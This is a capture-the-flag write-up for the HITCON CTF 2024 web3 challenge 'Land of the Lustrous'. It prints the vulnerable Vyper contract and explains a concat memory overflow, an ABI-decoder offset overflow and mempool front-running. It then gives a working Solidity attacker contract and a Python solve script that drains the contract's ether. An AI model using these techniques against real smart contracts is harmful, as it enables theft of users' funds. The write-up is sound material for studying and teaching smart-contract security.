2024 | HITCON CTF | web3



"In a world inhabited by crystalline lifeforms called The Lustrous, every unique gem must fight for their way of life against the threat of lunarians who would turn them into decorations." – Land of the Lustrous

nc lustrous.chal.hitconctf.com 31337

#pragma version ==0.3.10

enum GemStatus:

struct Gem:
    health: int256
    max_health: int256
    attack: int256
    hardness: int256
    status: GemStatus

struct Lunarian:
    health: int256
    attack: int256
    rounds: uint256

interface Master:
    def get_actions() -> DynArray[uint8, MAX_ROUNDS]: view
    def decide_continue_battle(round: uint256, lunarian_health: int256) -> bool: nonpayable

stage: public(uint8)
master_addr: public(address)
lunarian_addr: public(address)
sequences: public(HashMap[address, uint32])
gems: public(HashMap[bytes32, Gem])
assigned_gems: public(HashMap[address, uint32])
continued: public(HashMap[address, bool])

ACTIVE_HEALTH_THRESHOLD: constant(int256) = 64
STAGES: constant(uint8) = 3
MAX_ROUNDS: constant(uint256) = 300
LUNARIANS: constant(Lunarian[STAGES]) = [
    Lunarian({ health: 1_000, attack: 10_000, rounds: 100 }),
    Lunarian({ health: 10_000, attack: 100_000, rounds: 200 }),
    Lunarian({ health: 1 << 64, attack: 1 << 128, rounds: 300 }),

def __init__():
    assert msg.value == as_wei_value(1_000_000, "ether")
    self.lunarian_addr = msg.sender

def is_solved() -> bool:
    return self.balance == 0

def register_master():
    assert self.master_addr == empty(address), "master already registered"
    self.master_addr = msg.sender

def transfer_master(new_master_addr: address):
    assert self.master_addr != empty(address), "master not registered"
    assert self.master_addr == msg.sender, "only master can transfer master"
    self.master_addr = new_master_addr

def create_gem() -> Gem:
    assert self.master_addr == msg.sender, "only master can create gem"
    assert msg.value == as_wei_value(1, "ether"), "invalid value"

    random: int256 = abs(convert(keccak256(convert(block.number, bytes32)), int256))
    gem: Gem = Gem({
        health: max(random % 256, ACTIVE_HEALTH_THRESHOLD),
        max_health: random % 256,
        attack: (random / 256) % 256,
        hardness: (random / (256 * 256)) % 256,
        status: GemStatus.ACTIVE,
    self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender])] = gem
    self.sequences[msg.sender] += 1
    return gem

def merge_gems() -> Gem:
    assert self.master_addr == msg.sender, "only master can merge gems"
    assert self.sequences[msg.sender] >= 2, "not enough gems to merge"

    gem1: Gem = self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2)]
    gem2: Gem = self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender] - 1)]

    assert (gem1.status == GemStatus.ACTIVE and gem2.status == GemStatus.INACTIVE) \
        or (gem1.status == GemStatus.INACTIVE and gem2.status == GemStatus.ACTIVE) \
        or (gem1.status == GemStatus.INACTIVE and gem2.status == GemStatus.INACTIVE), "invalid gem status"

    gem: Gem = Gem({
        health: gem1.health + gem2.health,
        max_health: gem1.max_health + gem2.max_health,
        attack: gem1.attack + gem2.attack,
        hardness: (gem1.hardness + gem2.hardness) / 2,
        status: self.calc_status(gem1.health + gem2.health),
    self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2)] = gem
    self.sequences[msg.sender] -= 1
    return gem

def pray_gem():
    assert self.master_addr == msg.sender, "only master can pray gem"
    assert self.sequences[msg.sender] >= 1, "not enough gems to pray"
    self.sequences[msg.sender] -= 1

def assign_gem(sequence: uint32):
    assert self.master_addr == msg.sender, "only master can assign gem"
    self.assigned_gems[msg.sender] = sequence

def battle(lunarian_actions: DynArray[uint8, MAX_ROUNDS]) -> (bool, int256, int256):
    assert self.lunarian_addr == msg.sender, "only lunarian can start battle"
    assert self.master_addr != empty(address), "master not registered"
    assert self.stage < STAGES, "invalid stage"

    lunarian: Lunarian = LUNARIANS[self.stage]
    master: Master = Master(self.master_addr)
    gem_actions: DynArray[uint8, MAX_ROUNDS] = master.get_actions()
    gem_id: bytes32 = self.get_gem_id(self.master_addr, self.assigned_gems[self.master_addr])

    assert self.assigned_gems[self.master_addr] < self.sequences[self.master_addr], "invalid assigned gem"
    assert len(lunarian_actions) == lunarian.rounds and len(gem_actions) == lunarian.rounds, "invalid actions"
    assert self.gems[gem_id].status == GemStatus.ACTIVE, "gem is not active"

    for r in range(lunarian.rounds, bound=MAX_ROUNDS):
        # rock paper scissors
        lunarian_action: uint8 = lunarian_actions[r]
        gem_action: uint8 = gem_actions[r]
        assert lunarian_action <= 2 and gem_action <= 2, "invalid action"

        if lunarian_action == gem_action:

        master_win: bool = (lunarian_action == 0 and gem_action == 1) \
            or (lunarian_action == 1 and gem_action == 2) \
            or (lunarian_action == 2 and gem_action == 0)

        if master_win:
            lunarian.health -= self.gems[gem_id].attack
            self.gems[gem_id].health -= lunarian.attack / self.gems[gem_id].hardness

        if self.calc_status(self.gems[gem_id].health) != GemStatus.ACTIVE:
            master.decide_continue_battle(r, lunarian.health)
            if self.continued[self.master_addr]:
                self.continued[self.master_addr] = False
                self.gems[gem_id].health = self.gems[gem_id].max_health 

        self.gems[gem_id].status = self.calc_status(self.gems[gem_id].health)
        if self.gems[gem_id].status != GemStatus.ACTIVE or lunarian.health <= 0:

    if self.gems[gem_id].status == GemStatus.ACTIVE \
        and (lunarian.health <= 0 or lunarian.health < self.gems[gem_id].health):
        if self.stage == 0:
            send(self.master_addr, as_wei_value(1, "ether"))
            self.stage += 1
        elif self.stage == 1:
            send(self.master_addr, as_wei_value(2, "ether"))
            self.stage += 1
        elif self.stage == 2:
            send(self.master_addr, self.balance)
            # congratz :)
        return True, lunarian.health, self.gems[gem_id].health
        self.stage = 0
        return False, lunarian.health, self.gems[gem_id].health

def continue_battle():
    assert self.master_addr == msg.sender, "only master can continue battle"
    assert msg.value == as_wei_value(1, "ether"), "invalid value"
    self.continued[msg.sender] = True

def get_gem_id(master_addr: address, sequence: uint32) -> bytes32:
    master_addr_bytes: bytes20 = convert(master_addr, bytes20)
    sequence_bytes: bytes4 = convert(sequence, bytes4)
    gem_id: bytes32 = keccak256(concat(master_addr_bytes, sequence_bytes))
    return gem_id

def calc_status(health: int256) -> GemStatus:
        return GemStatus.ACTIVE
    elif 0 <= health:
        return GemStatus.INACTIVE
        return GemStatus.DESTROYED


  • Initially, there are 1,000,000 ether deposited into the contract, which we have to drain and solve the challenge. Only the battle() function in the contract can obtain ether
  • The battle has three stages, each corresponding to a lunarian with different health and attack power. At each stage, if gem is still active and has more health than the lunarian after all rounds are over, the corresponding stage funds will go to us. Getting 1 or 2 ether each time has little effect, while the instance will automatically terminate in 10 minutes. Obviously, we have to win stage 2

    if self.gems[gem_id].status == GemStatus.ACTIVE \
        and (lunarian.health <= 0 or lunarian.health < self.gems[gem_id].health):
        if self.stage == 0:
            send(self.master_addr, as_wei_value(1, "ether"))
            self.stage += 1
        elif self.stage == 1:
            send(self.master_addr, as_wei_value(2, "ether"))
            self.stage += 1
        elif self.stage == 2:
            send(self.master_addr, self.balance)
            # congratz :)
  • The winner of each round in a stage is determined by lunarian_actions array and an array returned by master.get_actions(). We don't have permission to call the battle() function, but we can obtain lunarian_actions from the pending transaction. Then, front run the transaction of battle() to set gem_actions and win each round as desired :D

    def battle(lunarian_actions: DynArray[uint8, MAX_ROUNDS]) -> (bool, int256, int256):
        assert self.lunarian_addr == msg.sender, "only lunarian can start battle"
        assert self.master_addr != empty(address), "master not registered"
        assert self.stage < STAGES, "invalid stage"
        lunarian: Lunarian = LUNARIANS[self.stage]
        master: Master = Master(self.master_addr)
        gem_actions: DynArray[uint8, MAX_ROUNDS] = master.get_actions()
        gem_id: bytes32 = self.get_gem_id(self.master_addr, self.assigned_gems[self.master_addr])
        for r in range(lunarian.rounds, bound=MAX_ROUNDS):
            # rock paper scissors
            lunarian_action: uint8 = lunarian_actions[r]
            gem_action: uint8 = gem_actions[r]
            assert lunarian_action <= 2 and gem_action <= 2, "invalid action"
            if lunarian_action == gem_action:
            master_win: bool = (lunarian_action == 0 and gem_action == 1) \
                or (lunarian_action == 1 and gem_action == 2) \
                or (lunarian_action == 2 and gem_action == 0)
  • The lunarian in stage 2 has a huge amount of health but the initial attack of the gem is only 255 at most. It costs 1 ether to create a gem, and we only start with 1.5 ether. Even if we can merge gems to increase the attack power of a gem, it is still difficult to win in 300 rounds

    LUNARIANS: constant(Lunarian[STAGES]) = [
        Lunarian({ health: 1_000, attack: 10_000, rounds: 100 }),
        Lunarian({ health: 10_000, attack: 100_000, rounds: 200 }),
        Lunarian({ health: 1 << 64, attack: 1 << 128, rounds: 300 }),
  • A master can have multiple gems. The data of each gem is stored in the contract via gem_id. The gem_id is the hash of master_addr and a sequence number. The get_gem_id() internal function uses the concat built-in function, which is related to a memory buffer overflow vulnerability1. That is, if a function calls an internal function that uses concat, the leading bytes of its first declared variable may be overwritten with zeros. In get_gem_id(), sequence_bytes will be mloaded and mstored right after previous copied master_addr_bytes, causing a 20-byte memory buffer overflow

    def get_gem_id(master_addr: address, sequence: uint32) -> bytes32:
        master_addr_bytes: bytes20 = convert(master_addr, bytes20)
        sequence_bytes: bytes4 = convert(sequence, bytes4)
        gem_id: bytes32 = keccak256(concat(master_addr_bytes, sequence_bytes))
        return gem_id
  • During the battle, if the gem is not in an active health, master.decide_continue_battle will be called, giving us the opportunity to merge gems and get a gem with negative health. By combining the vulnerability of concat, we can obtain a gem with high health to win the battle ;)

    def merge_gems() -> Gem:
        gem: Gem = Gem({
            health: gem1.health + gem2.health,
            max_health: gem1.max_health + gem2.max_health,
            attack: gem1.attack + gem2.attack,
            hardness: (gem1.hardness + gem2.hardness) / 2,
            status: self.calc_status(gem1.health + gem2.health),
        self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2)] = gem
        self.sequences[msg.sender] -= 1
        return gem


The exploitation steps are as follows:

  1. Create gem0 with a favorable attack value and win stage 0 with it
  2. Create gem1 with a favorable health and draw stage 1 to reset stage to 0 without losing any health
  3. Intentionally lose stage 0 with gem1 to make its status inactive
  4. Win stage 0 with gem0
  5. In stage 1, gem0's health can go negative with only one attack. During the master.decide_continue_battle(), gem0 is still active and can pass the status check in merge_gems() along with gem1. After merging, gem0 has enough health to win stage 1 and 2
contract Master {

    int256 constant ACTIVE_HEALTH_THRESHOLD = 64;

    ILandOfTheLustrous land;
    uint8[] actions;
    bool canMerge;

    constructor(ILandOfTheLustrous _land) {
        land = _land;

    function first() external payable {
        int256 random = int256(uint256(keccak256(abi.encode(block.number))));
        if (random < 0) {
            random = -random;
        require((random / 256) % 256 >= 10);
        land.create_gem{value: 1 ether}();

    function second() external {
        int256 random = int256(uint256(keccak256(abi.encode(block.number))));
        if (random < 0) {
            random = -random;
        int256 health = random % 256;
        if (health < ACTIVE_HEALTH_THRESHOLD) {
            health = ACTIVE_HEALTH_THRESHOLD;
        int256 hardness = (random / (256 * 256)) % 256;
        while (health >= ACTIVE_HEALTH_THRESHOLD) {
            health -= 10_000 / hardness;
        require(health >= 0);
        land.create_gem{value: 1 ether}();

    function third() external {
        canMerge = true;

    function set_actions(uint8[] memory lunarian_actions, uint256 start, uint8 draw) external {
        uint256 len = lunarian_actions.length;
        uint8[] memory _actions = new uint8[](len);
        for (uint256 i; i < start; i++) {
            _actions[i] = (lunarian_actions[i] + 2 + draw) % 3;
        for (uint256 i = start; i < len; i++) {
            _actions[i] = (lunarian_actions[i] + 1) % 3;
        actions = _actions;

    function get_actions() external view returns (uint8[] memory) {
        return actions;

    function decide_continue_battle(
    ) external returns (bool) {
        if (canMerge) {
        return true;

    receive() external payable {}
import pwn
import hashlib
import time
from typing import Callable
from threading import Thread

from cheb3 import Connection
from cheb3.utils import load_compiled, decode_data

def connect():
    return pwn.remote("lustrous.chal.hitconctf.com", 31337)

def solve_pow(p):
    cmd = p.recvline_contains(b"python3").decode().strip().split(" ")
    preimage_prefix = cmd[-2].encode()
    bits = int(cmd[-1])
    for i in range(0, 1 << 32):
        your_input = str(i).encode()
        preimage = preimage_prefix + your_input
        digest = hashlib.sha256(preimage).digest()
        digest_int = int.from_bytes(digest, "big")
        if digest_int < (1 << (256 - bits)):
            ans = your_input
    p.sendlineafter(b"YOUR_INPUT =", ans)

def do_battle():
    p = connect()
    p.sendlineafter(b"action?", b"3")
    p.sendlineafter(b"uuid please:", uuid)

def frontrun(handler: Callable) -> bool:
    pending_filter = conn.w3.eth.filter('pending')

    battle_thread = Thread(target=do_battle, args=[])

    while True:
        pending_entries = pending_filter.get_new_entries()
        if pending_entries != []:
            print("[+] Frontrunning")
            for txn_hash in pending_entries:
                txn = conn.w3.eth.get_transaction(txn_hash)
                if txn['to'] == land_addr:
                    decoded_input = decode_data(txn['input'][4:], ["uint8[]"])
                    handler(decoded_input, txn['gasPrice'])
                    return True

        if not battle_thread.is_alive():
            print("[-] Frontrun failed")
            return False

def frontrun_handler(lunarian_actions: list[int], gas_price: int):
    master.functions.set_actions(lunarian_actions, start_index, to_draw).send_transaction(gas_price=gas_price + 100)

p = connect()
p.sendlineafter(b"action?", b"1")
uuid = p.recvline_contains(b"uuid:").split(b" ")[-1]
print(f"{uuid = }")
conn = Connection(p.recvline_contains(b"rpc endpoint:").decode().split(" ")[-1])
account = conn.account(p.recvline_contains(b"private key:").decode().split(" ")[-1])
land_addr = p.recvline_contains(b"challenge contract:").decode().split(" ")[-1]

land_abi, _ = load_compiled("ILandOfTheLustrous.sol")
land = conn.contract(account, abi=land_abi, address=land_addr)

master_abi, master_bin = load_compiled("PoC.t.sol", "Master")
master = conn.contract(account, abi=master_abi, bytecode=master_bin)

while True:

start_index, to_draw = 0, 0
frontrun(frontrun_handler)  # win stage 0

while True:

start_index, to_draw = 200, 1
frontrun(frontrun_handler)  # draw stage 1

start_index, to_draw = 100, 0
frontrun(frontrun_handler)  # lose stage 0


start_index = 0
frontrun(frontrun_handler)  # win stage 0

start_index = 1
frontrun(frontrun_handler)  # lose -> merge -> win stage 1

start_index = 0
frontrun(frontrun_handler)  # win stage 2

print("solved?", land.caller.is_solved())

if land.caller.is_solved():
    p = connect()
    p.sendlineafter(b"action?", b"4")
    p.sendlineafter(b"uuid please:", uuid)




  • By checking the author's writeup, there is another vulnerability2 that is also expected to be utilized
  • Argument(s) is (are) encoded as a tuple. The ABI encoding of a tuple consists of two areas: the statically encoded head and the dynamically encoded tail. For dynamic types, the head contains the offset of the location within the tail where the data is stored
  • Prior to Vyper 0.4.0, the ABI decoder does not have a buffer overflow check for dynamic offsets. To decode data containing dynamic types, the decoder will retrieve the actual data with the offset information and the raw data location in the memory

    Vyper stores all variables in memory, including primitives

  • Take _abi_decode(x, Bytes[32]) as an example. Assume that the variable x is stored in memory starting from 0x140. According to the specified type, the decoder will get the actual data position by calculating offset+0x160. In this example, the bytes string data is stored in memory starting from 0x180 (0x20+0x160)

    0x140   0x0000000000000000000000000000000000000000000000000000000000000060  [length]
    0x160   0x0000000000000000000000000000000000000000000000000000000000000020  [encoded bytes - offset]
    0x180   0x0000000000000000000000000000000000000000000000000000000000000003  [encoded bytes - length]
    0x1a0   0x666f6f0000000000000000000000000000000000000000000000000000000000  [encoded bytes - data]
  • By setting the offset to a value that causes the position calculation to overflow, it is possible to decode arbitrary data in the memory. In the above example, we can set the offset to 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0 to decode data located at 0x100

  • In this challenge, we can let master.get_actions() return a byte string containing a specific offset to achieve the purpose of copying the lunarian's actions without front-running


最后更新: 2024年7月26日 22:22:15
Contributors: YanhuiJessica
